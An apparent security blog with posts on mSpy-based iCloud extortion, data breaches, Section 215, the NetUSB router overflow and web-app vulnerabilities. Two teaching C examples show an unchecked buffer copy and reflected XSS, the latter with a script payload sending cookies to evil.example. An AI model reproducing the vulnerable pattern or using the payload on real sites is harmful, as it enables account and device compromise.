A New Form Of Ransomware

In addition to the traditional ransomware that everyone knows about, the AdultFriendFinder breach I wrote about earlier has hackers blackmailing users of the site.  Now mSpy customers are being extorted too.

Brian Krebs is reporting that hackers are using the mSpy breach to extort iPhone users.  Apparently, setting up mSpy involves entering an iTunes user ID and password so that mSpy can extract the monitored phone’s data from iCloud.

mSpy is used to spy on your “loved ones” (a strange concept), so you install it on their phones.  But they are not supposed to know it is there.  What is not clear to me is whether the iTunes accounts in the hacked data belong to the people being spied on, the people doing the spying, or both.  From what I have read, it appears to be the people being spied on, which means they don’t even know that their accounts have been compromised.

With all of the mSpy user data now available on the dark web, hackers are very quickly extracting those iTunes user IDs and passwords from the dump.

Next, connecting through Tor, the hackers log into the account with those ill-gotten credentials and use the Find My iPhone feature to remotely wipe the phone, display a message saying that the phone has been hacked, and tell the owner that the only way to get it back is to pay a ransom.

Since most Apple users rely on the Apple ecosystem for backups, and the hackers now control the user’s iTunes/iCloud account, the user, their phone, their data and their backups are all under the hackers’ control.  Even having taken over the iTunes account, I don’t think the hacker would be able to reach any local backups made with iTunes on the user’s Mac or PC, if such backups exist.

So, do you pay the ransom?  Or not?  A dilemma.

And, if you do, will the hacker return control of your iTunes account and phone?

One thing to consider is keeping backups completely outside the Apple universe.  At least then you could get your data back.

Adult Dating Site Hacked; Members’ “Interests” Revealed

CNN and others have reported on the hacking of the adult dating site AdultFriendFinder, where members enter their interests in non-traditional sexual relationships.  Over 3 million members’ “interests” and other information were revealed in the data released so far.

According to the site, it has  “helped millions of people find traditional partners, swinger groups, threesomes, and a variety of other alternative partners.”  AdultFriendFinder claims to have over 60 million members, but data has been released on only around 3.5 million of those members.  Whether the hacker has more data to release later or not is unclear.

Information revealed includes email address, birthday, password and sexual preferences.  From this information, it is pretty easy to use social media and Google to figure out people’s names.

The Mirror is saying that nude pictures of members were also part of the hacked data.

CIO magazine said that credit card data may be among the hacked data as well, but that it was removed from the copy put up for sale.  They said the database is being offered for 70 bitcoins, or around $17,000.

The hacker who claims to have done this said that he attempted to blackmail the site for $100,000, which I gather they did not pay.

Other hackers on the forum where the data was posted said that they planned to use the information to attack victims.  Apparently, a number of the members are government employees, including law enforcement.  One obvious form of attack would be to blackmail the victims.

FriendFinder Networks, which owns the site along with other adult sites and publications, said that it didn’t know the extent of the breach, but was working with law enforcement and Mandiant.

In a statement they said, “We cannot speculate further about this issue, but rest assured, we pledge to take the appropriate steps needed to protect our customers if they are affected.”

I am not sure how they might protect their customers – I don’t think there is reputation protection insurance available.

While users of a site like this should have an expectation of privacy, this should be a reminder that there are no guarantees.


FBI Admits No Major Terrorism Cases Solved Using Section 215

The DoJ Inspector General just released an assessment of the FBI’s use of the mass data collection powers in Section 215 of the Patriot Act, whose renewal is currently being debated in Congress.  The report says that the agents interviewed could not point to any major case developments that resulted from Section 215 orders.  The Inspector General said:

"As with our previous reviews, the agents we interviewed did not identify any major case developments that resulted from the use of the records obtained in response to Section 215 orders, but told us that the material produced pursuant to Section 215 orders was valuable in that it is used to support other investigative requests, develop investigative leads and corroborate other information."

To be fair, the FBI’s use of Section 215 is minimal, although increasing.

Also, the national security community (the NSA and related agencies) probably obtained a lot more Section 215 orders than the FBI, and this report does not include data on that.  And a single order can be very broad: the one served on Verizon said, in effect, provide every single call record for these three months.  One order, lots of data.

Google, for example, publishes ranges for the number of requests it receives.  For the period January to June 2014 (the last period available), Google said it received fewer than a thousand FISA court requests covering around 15,000 accounts, and fewer than a thousand National Security Letters covering fewer than a thousand accounts (see report).  Google should be considered one of the larger recipients of such requests, along with Facebook and Microsoft, so the fact that those numbers are small does suggest some discretion in asking for information.

The IG’s report also talked about the FBI’s efforts at data minimization, which were required as part of the 2006 Patriot Act reauthorization.  Generally speaking, the IG said that the FBI was not compliant with the law, but after several reports (covering different years), the FBI is doing a better job.

All this was announced at a time when Congress is trying to figure out a path forward.  Absent Congressional action, Section 215 and some other sections of the Patriot Act expire on June 1, 2015.  Different groups in Congress have significantly different views on what should happen, and one possibility is to kick the can down the road a few months, a technique Congress often uses.

The NSA said that if Congress had not granted it an extension of authority by today (May 22, 2015), it would begin winding down its Section 215 activities to make sure it was compliant by June 1.

Congress will likely do something in the next week, before the Section 215 provisions expire.  This is one of those places where big, invasive government, national security and personal privacy collide, and it is unclear what the result will be.

Millions Of Routers And Other Products Vulnerable To NetUSB Bug

Another day, another software supply chain vulnerability.  This time, ZyXEL and D-Link have confirmed that their routers have the bug, and researchers think products from Netgear, TP-Link, Trendnet and other vendors are vulnerable as well.  Already 90-plus products from more than 20 vendors have been tentatively identified as vulnerable.  Only TP-Link has announced a patch.  The bug lets an attacker take control of the device in kernel mode.  Anyone taking bets that most owners will not patch this (see article and article)?

The feature, NetUSB, allows users of an affected device to share a USB device over the network.  In some implementations the sharing is only reachable from the local network, but others may expose it to the Internet.  Even in the local-only case, that means that if you infect any device on the local network, you can take over the vulnerable router or other device from there.

Some manufacturers allow you to turn off the feature, but others do not.

The buggy software was bought from Taiwan-based KCodes Technology.  All it takes to trigger the takeover is to connect to the affected device and present a computer name longer than 64 characters.  That name is copied into a fixed-size buffer in the kernel driver without a length check, which causes a buffer overflow, and the rest is history.  That sounds hard, huh?
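To make the bug class concrete, here is an added example in C (not the KCodes driver and not code from any of the linked articles): a client-supplied length is trusted when a computer name is copied into a 64-byte buffer, beside the one extra check that fixes it.  The wire layout (a 32-bit length followed by the name bytes), the struct layout and the sentinel field are assumptions made for the demo.  The real driver runs in the kernel and the overrun lands on kernel data; the demo keeps the overrun inside one struct so the corruption is observable instead of a crash.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Maximum computer-name length the parser expects (the 64-character
 * figure reported for the NetUSB bug). */
#define NETUSB_NAME_MAX 64

/* Hypothetical connection record: the name buffer, followed by some
 * other field that happens to sit right after it in memory.  In the
 * real driver the neighbour would be kernel data; here it is a
 * sentinel so that an overrun can be detected. */
struct netusb_conn {
    char name[NETUSB_NAME_MAX];
    char sentinel[16];
};

#define SENTINEL "KERNEL-DATA-OK!"   /* 15 chars + NUL = 16 bytes */

/* Assumed wire format: little-endian 32-bit length, then that many
 * name bytes.  Returns 0 on success, -1 if the message is too short. */
static int read_len(const uint8_t *msg, size_t msg_len, uint32_t *out)
{
    if (msg_len < 4) return -1;
    *out = (uint32_t)msg[0] | ((uint32_t)msg[1] << 8) |
           ((uint32_t)msg[2] << 16) | ((uint32_t)msg[3] << 24);
    return 0;
}

/* Vulnerable pattern: trust the client-supplied length and copy. */
int parse_name_unchecked(struct netusb_conn *c, const uint8_t *msg, size_t msg_len)
{
    uint32_t len;
    if (read_len(msg, msg_len, &len) < 0 || msg_len - 4 < len) return -1;
    /* Copy via the struct base so the demo stays inside one object; a
     * real driver copies straight into the name array and lets the
     * overrun run into whatever follows it. */
    memcpy((char *)c + offsetof(struct netusb_conn, name), msg + 4, len);
    return 0;
}

/* Hardened pattern: reject anything that does not fit (leaving room
 * for the terminator) and always terminate the string. */
int parse_name_checked(struct netusb_conn *c, const uint8_t *msg, size_t msg_len)
{
    uint32_t len;
    if (read_len(msg, msg_len, &len) < 0 || msg_len - 4 < len) return -1;
    if (len >= NETUSB_NAME_MAX) return -1;   /* the missing check */
    memcpy(c->name, msg + 4, len);
    c->name[len] = '\0';
    return 0;
}

/* Build a handshake message carrying an n-byte name of 'A's
 * (constructed input).  Returns the message length, 0 if it does not fit. */
size_t build_msg(uint8_t *buf, size_t cap, uint32_t n)
{
    if (cap < 4 + (size_t)n) return 0;
    buf[0] = n & 0xff; buf[1] = (n >> 8) & 0xff;
    buf[2] = (n >> 16) & 0xff; buf[3] = (n >> 24) & 0xff;
    memset(buf + 4, 'A', n);
    return 4 + n;
}

/* Feed one parser an n-byte name.  Returns 1 if the sentinel was
 * clobbered (overflow happened), 0 if it survived, -1 if the parser
 * rejected the message, -2 if n is larger than this demo can hold. */
int probe(int (*parser)(struct netusb_conn *, const uint8_t *, size_t), uint32_t n)
{
    struct netusb_conn c;
    uint8_t msg[4 + sizeof(struct netusb_conn)];
    size_t msg_len = build_msg(msg, sizeof msg, n);
    if (msg_len == 0) return -2;
    memset(c.name, 0, sizeof c.name);
    memcpy(c.sentinel, SENTINEL, sizeof SENTINEL);
    if (parser(&c, msg, msg_len) < 0) return -1;
    return memcmp(c.sentinel, SENTINEL, sizeof SENTINEL) != 0;
}

int main(void)
{
    printf("unchecked, 32-byte name: %d\n", probe(parse_name_unchecked, 32)); /* 0: fine */
    printf("unchecked, 80-byte name: %d\n", probe(parse_name_unchecked, 80)); /* 1: sentinel clobbered */
    printf("checked,   80-byte name: %d\n", probe(parse_name_checked, 80));   /* -1: rejected */
    return 0;
}
```

The point of the sentinel is that the vulnerable parser reports success on the 80-byte name while silently overwriting the field next to the buffer; in the driver that field is kernel memory, which is why the reports describe a kernel-mode takeover.  The fixed version differs by a single comparison against the buffer size, which is exactly the kind of check a vendor buying the software should have been testing for.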

This is a supply chain problem because vendors like TP-Link (the only one that has released a patch so far) thought this was a nifty feature, so they bought the Linux software from KCodes, probably for very little money.  They did not do an extensive vulnerability assessment of the software; they probably just looked at the sales flyer and tested to see that it worked as described.

Netgear, whose products are affected, calls the feature ReadySHARE and says it will release a patch this fall, but it has not announced specifically which products are vulnerable.  I am sure that hackers will be very patient and wait until after that patch is released this fall and you install the fix before attempting to exploit it.  NOT!

Oh, yeah: on Netgear devices at least, the feature cannot be disabled at all.  And disabling the feature in another vendor’s web interface only helps if that actually unloads the driver rather than just hiding the setting, since it is the driver that accepts the connections.  It also cannot be firewalled off on the device.

Given the brands that have fessed up to using it, most of the affected products are likely to be in homes, home offices and small businesses.  How many of those owners even understand patching something like a router?


Which is why software supply chain problems are a real problem.

Businesses that use technology or buy software (does that cover most businesses?) need to start dealing with the software supply chain issue, like now.  And it is not simple, because when you buy the XYZ product it doesn’t say “contains software bought from the lowest cost vendor in Molnevia”.  THAT is part of the problem.


Radio Shack Cannot Sell Customer Info

After Radio Shack filed for bankruptcy, it was announced that Radio Shack was going to sell its customer information, covering over 100 million customers.

Quickly, several camps came to the bankruptcy court to argue against the sale.

First in line was AT&T (see article) and other carriers.  AT&T claimed that, under its agreement with Radio Shack, the data belonged to AT&T.

Next came the privacy advocates.  Radio Shack’s privacy policy said it would never sell or rent its customer list, and this sure looked like that.

After that came the Attorneys General of 38 states, who argued this was a deceptive trade practice because it went against the company’s written privacy policy.

Finally, the director of the privacy section of the Federal Trade Commission sent the court a letter arguing against allowing the sale.

Given all this, you would think it would be a slam dunk that the court would not allow it, but bankruptcy courts have a mind of their own.

What is also unclear is what conversations may have occurred off the record.  For example, the FTC may have told the court that it couldn’t stop the sale, but that it could issue an order to the buyer regarding the use of the records.  One would have to assume that the buyer would want to use them for sales.

Well, the answer is out.

Texas AG Ken Paxton announced today that the overwhelming bulk of the data will be destroyed: no credit card or Social Security data will be transferred, and of the 8.5 million email addresses in the database, the buyer of the Radio Shack brand only gets to keep the email addresses (no phone numbers) of people who requested product information in the last two years.

The buyer will also have to agree to abide by Radio Shack’s former privacy policy.

All in all, this turned out pretty well for the privacy advocacy side.

This precedent adds weight to the legal theory that courts will really hold you to your privacy policy, even in bankruptcy.

Half Of All Retail And Healthcare Websites Always Vulnerable

Following up on yesterday’s post on the time it takes to detect hackers inside your systems, a new report out today says that about half of the web sites of retail and healthcare businesses are always vulnerable, mostly because of slow remediation rates.

WhiteHat Security’s report (see article) says that 47% of applications tested had cross site scripting vulnerabilities, 56% leaked information and 70% did not secure communications sufficiently.

The developers argued that the 70% number wasn’t fair because it included sites that had not fixed Heartbleed from last year, and Heartbleed is really an infrastructure problem, not an application problem (which kind of validates the slow remediation rate comment above).

But we have been talking about cross site scripting issues for years, so what are the developers’ excuses for that?
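For anyone who has not seen why the cross site scripting number refuses to go down, here is an added example (not WhiteHat’s code and not from any site in the report) of the reflected XSS pattern beside the fix, written in C to keep it self-contained.  The page template, the html_escape helper, the search query and the evil.example URL are all made up for the illustration; the only difference between the vulnerable and the safe version is that the user-supplied value is encoded for the HTML context it lands in.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Append a literal and return the advanced write pointer. */
static char *put(char *o, const char *s)
{
    size_t n = strlen(s);
    memcpy(o, s, n);
    return o + n;
}

/* Encode text for an HTML element body or double-quoted attribute: the
 * five characters that can break out of those contexts.  Returns a
 * malloc'd string the caller frees, or NULL on allocation failure. */
char *html_escape(const char *in)
{
    size_t n = 0;
    for (const char *p = in; *p; p++) {
        switch (*p) {
        case '&':  n += 5; break;            /* &amp;  */
        case '<':
        case '>':  n += 4; break;            /* &lt; &gt; */
        case '"':  n += 6; break;            /* &quot; */
        case '\'': n += 5; break;            /* &#39;  */
        default:   n += 1;
        }
    }
    char *out = malloc(n + 1);
    if (!out) return NULL;
    char *o = out;
    for (const char *p = in; *p; p++) {
        switch (*p) {
        case '&':  o = put(o, "&amp;");  break;
        case '<':  o = put(o, "&lt;");   break;
        case '>':  o = put(o, "&gt;");   break;
        case '"':  o = put(o, "&quot;"); break;
        case '\'': o = put(o, "&#39;");  break;
        default:   *o++ = *p;
        }
    }
    *o = '\0';
    return out;
}

/* Vulnerable: the search term is reflected into the page as-is. */
int render_search_unescaped(char *page, size_t cap, const char *query)
{
    return snprintf(page, cap, "<p>Results for: %s</p>", query);
}

/* Hardened: the same template, with the term encoded for HTML text. */
int render_search_escaped(char *page, size_t cap, const char *query)
{
    char *safe = html_escape(query);
    if (!safe) return -1;
    int n = snprintf(page, cap, "<p>Results for: %s</p>", safe);
    free(safe);
    return n;
}

/* 1 if the rendered page contains a live <script tag, else 0. */
int contains_script_tag(const char *page)
{
    return strstr(page, "<script") != NULL;
}

/* Render a query with either template and report whether the browser
 * would see a script tag: 1 yes, 0 no, -1 on a rendering error. */
int reflects_script(int escaped, const char *query)
{
    char page[1024];
    int n = escaped ? render_search_escaped(page, sizeof page, query)
                    : render_search_unescaped(page, sizeof page, query);
    if (n < 0 || (size_t)n >= sizeof page) return -1;
    return contains_script_tag(page);
}

int main(void)
{
    /* Constructed attacker input: steals the session cookie. */
    const char *q = "<script>location='http://evil.example/?c='+document.cookie</script>";
    char page[1024];
    render_search_unescaped(page, sizeof page, q);
    printf("%s\nscript tag present: %d\n", page, contains_script_tag(page)); /* 1 */
    render_search_escaped(page, sizeof page, q);
    printf("%s\nscript tag present: %d\n", page, contains_script_tag(page)); /* 0 */
    return 0;
}
```

Every web framework worth using ships an equivalent of html_escape and turns it on by default in its templates; the 47% figure is what you get when developers build strings by hand, or switch the escaping off because it mangled some output, and nobody is accountable for checking.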

My take is that vulnerabilities are vulnerabilities, and ONE person needs to be accountable for removing them.  Whether it is the developer or someone else, it needs to be someone you can corner and say “fix it” to.

One thing that helps developers of custom apps and web sites is that each site is a one-off.  If you figure out how to compromise Microsoft Office, you can use that to attack, say, “quite a few” people.  If I attack Joe’s Plumbing’s web site, all I get is Joe’s 50,000 customers to infect.

Still, hackers build automated tools that crawl the web looking for vulnerabilities, so Joe shouldn’t rest too easy.  Also, Joe probably doesn’t understand static and dynamic code analysis and other risk reduction techniques as well as Microsoft does, so there are probably far more vulnerabilities per 1,000 lines of code in Joe’s internal and public-facing apps than in Office.  And we never seem to run out of vulnerabilities in Office, so what does that say about Joe’s apps?

So, if you are Joe, you shouldn’t rest – get to fixin’ those vulnerabilities!